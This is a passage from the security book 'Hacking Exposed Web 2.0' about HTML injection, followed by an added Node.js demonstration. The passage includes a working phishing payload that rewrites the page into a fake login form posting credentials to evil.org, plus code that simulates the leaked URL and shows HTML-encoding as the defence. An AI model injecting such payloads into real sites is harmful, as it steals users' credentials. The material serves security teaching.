Page 112

Rich Cannings, Himanshu Dwivedi, Zane Lackey, and Alex Stamos

"Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions"

One of the common images suitable for print is Stall0wn3d.
The HTML injection string for this attack could simply be this:
.
However, controlling how a web application appears to a victim can be far more
useful to an attacker than displaying a hot picture of Sylvester Stallone. An
attacker could perform a phishing attack that coerces the user into handing over
confidential information. Using document.body.innerHTML, an attacker can replace
the page with a login form that looks identical to the vulnerable web application's
own login page. Because the form is rendered by the page that contains the HTML
injection, the browser's address bar still shows the legitimate domain, but when the
form is submitted the data goes to a site of the attacker's choosing. When the
victim enters his or her username and password, the credentials are sent to the
attacker. The code could be something like this:
// Tags were lost in extraction and are reconstructed here; the user-name field
// name (u), the password input type and the submit button are assumptions.
document.body.innerHTML=
    "<h1>Company Login</h1>" +
    "<form action=http://evil.org/grabPasswords method=get>" +
    "User name: <input name=u><br>" +
    "Password: <input name=p type=password><br>" +
    "<input type=submit value=Login>" +
    "</form>";
One simple trick in this code is that the form is submitted with a GET request, so the victim's username and password travel in the query string of the URL that is requested from the attacker's server.
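The following is an added example, not code from the book: it builds the innerHTML phishing payload described above, simulates what the browser does when the victim clicks Login (showing why method=get puts the credentials straight into the URL), and shows that HTML-encoding the untrusted input before it reaches the page leaves no form to submit. The evil.org URL and the field name p come from the page; the user-name field name u, the helper names (attr, parseForm, simulateSubmit, escapeHtml) and the sample credentials are assumptions. It runs under Node without a browser; the tiny regex "parser" only mimics form submission and is not a general HTML parser.

```javascript
// Added example (not from the book). Assumed: field names u/p, helper names,
// and the sample credentials. The evil.org URL is the one used in the text.

// The markup the attacker injects into the vulnerable page.
const PHISHING_MARKUP =
  '<h1>Company Login</h1>' +
  '<form action=http://evil.org/grabPasswords method=get>' +
  'User name: <input name=u><br>' +
  'Password: <input name=p type=password><br>' +
  '<input type=submit value=Login>' +
  '</form>';

// The full injection as it would be written into the page via innerHTML.
const INJECTION_SCRIPT =
  'document.body.innerHTML="' + PHISHING_MARKUP.replace(/"/g, '\\"') + '";';

// Read one attribute (quoted or unquoted) out of a single tag.
function attr(tag, name) {
  const re = new RegExp('\\b' + name + '=(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = tag.match(re);
  return m ? (m[1] ?? m[2] ?? m[3]) : undefined;
}

// Minimal stand-in for the browser: find the first <form>, its action and
// method, and the named, non-submit inputs in document order.
function parseForm(html) {
  const formTag = (html.match(/<form[^>]*>/i) || [])[0];
  if (!formTag) return null;            // nothing to submit
  const fields = (html.match(/<input[^>]*>/gi) || [])
    .map((tag) => ({ name: attr(tag, 'name'), type: (attr(tag, 'type') || 'text').toLowerCase() }))
    .filter((i) => i.name && i.type !== 'submit')
    .map((i) => i.name);
  return {
    action: attr(formTag, 'action'),
    method: (attr(formTag, 'method') || 'get').toLowerCase(),
    fields,
  };
}

// What leaves the victim's browser on submit. With method=get the values are
// appended to the URL, so they land in evil.org's access log with no
// server-side code needed; with method=post they ride in the request body.
function simulateSubmit(html, values) {
  const form = parseForm(html);
  if (!form) throw new Error('no form in markup');
  const encoded = form.fields
    .map((f) => encodeURIComponent(f) + '=' + encodeURIComponent(values[f] ?? ''))
    .join('&');
  if (form.method === 'get') return { url: form.action + '?' + encoded, body: '' };
  return { url: form.action, body: encoded };
}

// Defender side: HTML-encode untrusted input before it is written into the
// page. The payload then renders as literal text and no <form> element exists.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

console.log(INJECTION_SCRIPT);
console.log(simulateSubmit(PHISHING_MARKUP, { u: 'alice', p: 'hunter2' }).url);
// -> http://evil.org/grabPasswords?u=alice&p=hunter2
console.log(parseForm(escapeHtml(PHISHING_MARKUP)));
// -> null
```

Run it with node; the first printed line is the credential-harvesting URL, which is exactly what would appear in the attacker's web server log after the victim clicks Login, and the second shows that the encoded version of the same payload contains no submittable form at all.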

